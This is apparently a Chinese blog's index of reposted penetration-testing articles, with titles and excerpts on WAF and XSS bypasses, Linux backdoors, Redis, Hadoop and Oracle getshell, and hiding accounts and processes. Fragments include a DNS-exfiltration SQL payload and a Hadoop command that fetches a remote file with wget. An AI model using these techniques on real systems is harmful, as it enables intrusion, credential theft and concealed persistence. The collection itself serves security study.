渗透
文章平均质量分 63
PD_3569
这个作者很懒,什么都没留下…
展开
-
通过 Web.config 绕过执行限制
在一个可读写的目录里无法执行脚本, 通过上传特殊的 web.config 文件突破限制.<?xml version="1.0" encoding="utf-8"?><configuration> <system.webServer> <handlers accessPolicy="Read, Write, Execute, ...转载 2019-08-23 12:23:34 · 1782 阅读 · 0 评论 -
Linux 多个留后门姿势
https://www.anquanke.com/post/id/155943在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维持权限,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一直在关注这方面,但还是没有找到满意的后门,在渗透圈一个人的资源总是有限往往你全力追求的,也不过是别人的一层关系就可...转载 2018-08-17 10:42:52 · 21277 阅读 · 0 评论 -
Redis在Windows环境下Getshell
https://uknowsec.cn/posts/notes/Redis%E5%9C%A8Windows%E7%8E%AF%E5%A2%83%E4%B8%8BGetshell.html虽说利用过程得 重启,我觉得 还有一种就是 利用钓鱼吧,直接在桌面生成一个 windows updade.dat或者一些诱导性质的文件名让用户点击,就是稍微不靠谱点 0.0环境搭建windows版本...原创 2018-08-07 10:21:24 · 5525 阅读 · 0 评论 -
端口转发 kali端口转发到物理机
工作中遇到kali只能nat,进而尝试kali端口映射到物理机获取shellwindows 实测可行,ew直接报错,linux懒得用服务器测试记录如下:[windows 端口转发 netsh]端口转发的设置也可以通过命令行还进行查看netsh interface portproxy dumpnetsh interface portproxy show all转发本地的555...原创 2018-08-05 22:52:06 · 2209 阅读 · 0 评论 -
报错注入邂逅load_file&into outfile搭讪LINES
https://xz.aliyun.com/t/24600x00 前言近期分析mysql利用报错注入读取文件内容,利用LINES TERMINATED BY在查询只返回一个字段时写webshell文件,以及如何利用load_file扫描判断文件是否存在。0x01 into outfile写文件要求用户具有file权限 文件不能覆盖写入,所以文件必须为不存在 如果secure_f...转载 2018-07-25 09:50:30 · 1394 阅读 · 0 评论 -
sql 注入 绕过 waf
https://notwhy.github.io/2018/06/sql-injection-fuck-waf/0x0 前言 0x1 注入点检测 0x2 bypass waf 0x3 自动化0x0 前言 这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波...转载 2018-07-01 10:07:40 · 4327 阅读 · 0 评论 -
史上最强内网渗透知识点总结
https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247487491&idx=1&sn=270336c6cca79b4a4e5d777d41ce71b7&chksm=ec1e202bdb69a93dba0f48f973132958c95d86b2db2b6d70b8ddd1cbe41c187fa08ca4c...转载 2018-06-02 14:51:09 · 38638 阅读 · 1 评论 -
update 无报错注入
在mysql中,字符串和数组进行或运算时,将得到数字。但是需要注意的是,这个特性需要在MySQL的非严格模式下才可以使用。非严格模式概念:很多集成的PHP环境(PHPnow WAMP Appserv等)自带的MySQL貌似都没有开启MySQL的严格模式。何为MySQL的严格模式,简单来说就是MySQL自身对数据进行严格的校验(格式、长度、类型等),比如一个整型字段我们写入一个字符串类型的数据,在非...原创 2018-06-05 16:08:24 · 798 阅读 · 0 评论 -
MSF 内网渗透(案例)
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...转载 2018-06-03 14:56:33 · 24431 阅读 · 3 评论 -
SSRF && Gopher && Redis && FastCGI
之前没尝试过 SSRF 用 Redis,虽然是老的东西了,但是自己试一下socat : socat是一個netcat(nc)的替代產品,可以稱得上nc++。socat的特點就是在兩個流之間建立一個雙向的通道。socat的地址類型很 多,有ip, tcp, udp, ipv6,pipe,exec,system,open,proxy,openssl,等等。redis 新版本貌似开启了safemode,...原创 2018-05-26 15:09:04 · 2433 阅读 · 0 评论 -
解析漏洞总结
一、IIS 5.x/6.0解析漏洞IIS 6.0解析利用方法有两种1.目录解析/xx.asp/xx.jpg2.文件解析wooyun.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。例如创建目录 wooyun.asp,那么/wooyun.asp/1.jpg将被当作asp文件来执行。假设黑阔可以控...转载 2018-05-20 11:34:01 · 305 阅读 · 0 评论 -
Oracle注入 - 命令执行&Shell反弹
https://www.t00ls.net/thread-45663-1-1.html0x01 Oracle安装CentOS 7 安装oracle10g,装了一天,特此记录 oracle9i,10G,11G,各版本下载资源Centos6/7下静默安装oracle10g0x02 命令执行本文测试环境均为:CentOS Linux release 7.2.1511 (Core)Oracle Datab...转载 2018-05-07 09:37:00 · 18612 阅读 · 1 评论 -
某APP安全检测 (360脱壳+算法分析+数据中转注入)
https://www.t00ls.net/articles-45803.html 最近对某一APP进行安全检测,整个过程花费几天时间,最耗时的就是写中转脚本实现数据的自动加密解密过程,而且过程中遇到许多小问题,折腾了许久。1. 360脱壳 因为APP是被加固了,要想获取更多有价值的信息或者是想更快的对数据包的加密算法进行分析最好的办法就是查看源码关键的加密函数,所有第一步...转载 2018-05-11 12:07:54 · 4955 阅读 · 0 评论 -
Windows下的"你画我猜" -- 告别效率低下的目录扫描方法
https://xz.aliyun.com/t/23180x01 前言对Web应用进行安全测试时,我们常常需要猜测网站的结构与目录,若能得到网站详尽的拓扑结构,得到重要的目录名,文件名信息,可以为我们后续的测试创造良好的基础。在Linux下,我们并没有特别好的办法,只能尝试去识别应用指纹,或者是暴力枚举,这是一种效率很低下的目录扫描方法,而且效果很差。但是如果碰到的是Windows环境,我们就拥有...转载 2018-05-03 19:26:16 · 681 阅读 · 0 评论 -
Drozer 安装使用 安卓渗透
安装链接 https://blog.csdn.net/luckchoudog/article/details/50924089#commentBox测试链接 https://blog.csdn.net/qq_35559358/article/details/78995124简述步骤windows 环境 下载 msi 文件出现文件夹 运行命令 提示 import 失败然后直接索性 加了个 sys.p...原创 2018-05-10 16:05:02 · 580 阅读 · 0 评论 -
nodejs & 反序列化漏洞 & 利用
https://www.yeahhub.com/nodejs-deserialization-attack-detailed-tutorial-2018/node.js是一个服务器端的运行环境,封装了Google V8引擎,V8引擎执行JavaScript速度非常快,性能非常好。Node.js进行了一些优化并提供替代API,这使得Google V8引擎能够在非浏览器环境下更有效的运行。但是...转载 2018-08-17 15:41:26 · 4732 阅读 · 0 评论 -
burpsuite & python插件 & sql注入
就是想自己写一个插件,因为burp日常使用很方便,点点点,自己扫描就行别的大部分都是自己需要转发一下,太麻烦,考虑的东西还有一些,但是先记录一下 关于requests报错问题,直接下载 jython 安装,然后把已有的python site-xxx 那个文件的内容贴过来即可函数都是实现了的,部分代码 直接删了 ~ 自己补充学习咯 ~ from burp import IB...原创 2018-08-27 13:08:16 · 1329 阅读 · 0 评论 -
攻击未授权访问的 Flink 集群
Flink 是一个针对流数据和批数据的分布式处理引擎,与 Storm 一起广泛应用于分布式实时计算场景中,且在某些场景下 Flink 性能要优于 Storm。然而 Flink 默认提供的 Web UI 却不支持鉴权,这就引发了非常明显的未授权问题。Flink Web UI在 macOS 上简单安装一个单节点 Flink,直接使用 Homebrew。 brew install apac...转载 2019-08-19 21:31:22 · 746 阅读 · 0 评论 -
axis2渗透测试wsdl文件上传
一 前言最近在渗透测试中,遇到一个比较有趣的站,因此来分享一下二 信息收集首先通过nmap进行端口扫描,同时通过dirsearch进行目录扫描,dirsearch扫描结果如下。通过目录扫描发现一些有用的信息第一 axis2构建的webservice第二 axis2的后台登录地址(/axis2/axis2-admin/)存在google axis2漏洞,发现多半都是默认口令...转载 2019-08-05 12:58:25 · 2738 阅读 · 0 评论 -
Dnslog在SQL注入 & 四种数据库
https://www.anquanke.com/post/id/98096mysqlhttp://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass) FROM test.test_user WHERE name='admin' LIMIT 1),'.mysql.nk4...原创 2019-03-07 16:27:10 · 2843 阅读 · 0 评论 -
Hadoop 8088 Getshell
工作遇到了,有幸测试成功,记录下。首先获取 application-idcurl -v -X POST 'http://target:8088/ws/v1/cluster/apps/new-application'1.json{ "am-container-spec":{ "commands":{"command":"wget http://123123123.ce...原创 2019-02-28 00:50:57 · 1436 阅读 · 0 评论 -
命令注入 bypass list
真的全啊,备份下。原文https://xz.aliyun.com/t/3918 命令注入OS命令注入(也称为shell注入)是一种web安全漏洞,它允许攻击者在运行应用程序的服务器上执行任意操作系统(OS)命令,通常会完全破坏应用程序及其所有数据。通常,攻击者可以利用OS命令注入漏洞来破坏宿主基础设施的其他部分,利用信任关系将攻击转移到组织内的其他系统。前置知识说到命令注入...转载 2019-02-12 17:10:25 · 1509 阅读 · 0 评论 -
XSS Bypass List
http://drops.wooyun.org/tips/845 这个就不知道 出处了 .... 刚用到了里边的几个,稍微修改下,成功绕过WAF ~ Mark 一下 ~0x00 背景本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分,前...转载 2019-02-22 11:28:13 · 407 阅读 · 0 评论 -
WSDL 文件测试
https://www.cnblogs.com/xueli/p/6145211.htmlhttps://www.cnblogs.com/xueli/p/9681526.html先用python大致看看,之后在考虑工具吧 输出有什么功能>>> import suds>>> url="http://www.webxml.com.cn/WebS...原创 2018-12-12 10:05:56 · 1331 阅读 · 0 评论 -
绕过PHP disable_functions
https://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb需要翻译,我自己看了一半,感觉太慢,还是用了Google翻译 Orz 简而言之,IMAP对应RSH,可以直接绕过PHP,来代替system等执行命令。...转载 2018-12-13 13:52:47 · 1041 阅读 · 0 评论 -
ElasticSearch 未授权访问利用
学弟找到个自己学校的 es 未授权,尝试利用一波,学习下如何使用 :)http://www.ruanyifeng.com/blog/2017/08/elasticsearch.htmlhttp://blog.51cto.com/feelmanc/1250430上边文档写的挺不错,我基本上都是在上边学到的。增删改我不想知道,我只想知道 如何查看我想要的数据 首先找有多少数据库(其...原创 2018-12-05 23:12:11 · 11704 阅读 · 0 评论 -
Linux 痕迹清理 & 隐藏进程
1. 偷换系统二进制文件( ps , top 等) 防范: 比对hash;系统完整性检查工具,比如tripwrie、aide等2. 修改hook调用函数 (修改命令返回结果,原函数getdents)防范: sysdig(开源),检测LD_PRELOAD环境变量是否有异常,ld.so.preload文件异常(时间,大小)3. 修改进程名字防范: /proc目录,查看exe的...原创 2018-09-29 11:14:40 · 1627 阅读 · 0 评论 -
windows 应急流程及实战演练
对于windows方面的,目前我涉及的比较少,近期打算主攻代码审计吧。php、java的框架各种的提上日程,感觉初步可以了之后再转 windows 注册表 日志 ps 等 逐步了解 域渗透。微信 竟然不允许 图片引用,原链接在此,方便日后查看 ~ 原 URL https://mp.weixin.qq.com/s/odo2Fjtklj-ibStAsyUjHw当企业发生黑客入侵、系...转载 2018-10-11 23:02:49 · 1478 阅读 · 0 评论 -
文件包含姿势 较详细且全面
https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/基本相关函数php中引发文件包含漏洞的通常是以下四个函数:include() include_once() require() require_once()reuqire() 如果在包含...转载 2018-09-13 10:52:34 · 4769 阅读 · 0 评论 -
WEB代理
https://www.secpulse.com/archives/74676.htmlhttp://gh0st.cn/archives/2018-09-11/1 之前大致见过这个东西,但是没有深入的理解,所以很久以来淡忘了看到key发的这个文章,耐心的看了一遍,了解到代理服务器(nginx,squid貌似这么拼的)一些运作机制以下是简单记录下---------------...转载 2018-09-12 10:55:55 · 1243 阅读 · 0 评论 -
SQL注入之骚姿势小记 & 替换 绕过
https://mp.weixin.qq.com/s/ORsciwsBGQJhFdKqceprSw1、IN之骚这个我也偶然发现的,也不知前辈们有没有早已总结好的套路了。w3school上对in操作符的介绍:http://www.w3school.com.cn/sql/sql_in.asp对它的描述:IN操作符允许我们在WHERE子句中规定多个值。也就说可以让我们依照一或数个不连续(...转载 2018-08-29 10:25:54 · 2791 阅读 · 0 评论 -
Bypass X-WAF SQL注入防御(多姿势)
https://mp.weixin.qq.com/s/5TQddrOqa8MmtsuHoCRu0Q Bypass X-WAF SQL注入防御(多姿势) https://www.anquanke.com/post/id/103771 打破基于OpenResty的WEB安全防护(CVE-2018-9230)先来一张拦截效果图利用参数溢出Bypass:绕过姿势:带上 X-Real-IP:8.8.8...转载 2018-04-22 13:34:30 · 731 阅读 · 0 评论 -
XSS过滤绕过速查表
1.介绍这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录:http://ha.ckers.org/xss.html。目前这个网页已经重定向到OWASP网站,将由OWASP维护和完善它。OWASP 的第一个防御备忘录项目:XSS (Cross Site Scripting)Prevention Ch转载 2017-12-16 22:51:42 · 4192 阅读 · 0 评论 -
文件包含漏洞 TIPS
https://www.chery666.cn/blog/2017/06/17/include.html0x01 原理网页代码在通过函数复用文件时,未对文件名进行安全检查时,从而导致恶意代码执行和敏感信息泄露。主要分为本地包含(LFI)和远程包含 (RFI)涉及到的危险函数:include(),require() 和 include_once(),require_onc转载 2017-12-14 11:49:54 · 2189 阅读 · 0 评论 -
代码审计 TIPS(1)
https://www.chery666.cn/blog/2017/12/11/Code-audit.html0x01 PHP 敏感配置项register_globals(php 版本小于 5.4 时存在)当该配置项为 ON 时,会把用户通过 GET、POST 提交的参数自动注册成全局变量。当代码中存在有未初始化的变量时,可能会导致变量覆盖的问题;(PS: 其中转载 2017-12-14 11:33:22 · 973 阅读 · 0 评论 -
php://filter 使用
0x00 前言php://filter是PHP中的一个协议,利用这个协议我们可以解决一些ctf的题目,或者挖掘出一些漏洞。0x01 php://filterphp://filter可以作为一个中间流来处理其他流,具有四个参数:名称描述备注resource=指定了你要筛选过滤的数据流。必选转载 2017-12-04 10:03:42 · 4621 阅读 · 0 评论 -
Rsync安全配置&利用
1、Rsync简介Rsync(remote synchronize)是一款实现远程同步功能的软件,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。rsync是用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法,而且可以通过ssh方式来传输文件,提高其保密性。此外,rsync是一款免费的软件。rsync 包括如下的一些特性:转载 2017-12-03 19:32:14 · 917 阅读 · 0 评论 -
挖洞经验 | 命令注入突破长度限制
0×01 背景http://www.freebuf.com/articles/web/154453.html很多时候,在我们历经千辛万苦挖掘出一个漏洞或者找到一个利用点的时候,却因为一些egg hurt的限制,导致get shell或者send payload无法成功,其实很多高手都是有一些trick的,但是往往一串包含各种trick的高深payload甩得你不知所云转载 2017-12-03 15:19:59 · 2517 阅读 · 0 评论 -
HTML中,闭合优先的神奇标签
https://mp.weixin.qq.com/s?__biz=MzAxNDY2MTQ2OQ==&mid=2650942821&idx=1&sn=8dc047dbb05db818d4b910c51c8811a1&chksm=80796f57b70ee6411190f963d8ec73428e3706a3c78b89650e3a13445474106acc95f2a1707b#rd转载 2017-12-20 10:46:18 · 1100 阅读 · 0 评论 -
渗透技巧——Windows系统的帐户隐藏
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%90%E6%88%B7%E9%9A%90%E8%97%8F/0x00 前言在之前的文章《渗透技巧——Windows系统远转载 2017-12-10 14:48:14 · 7382 阅读 · 0 评论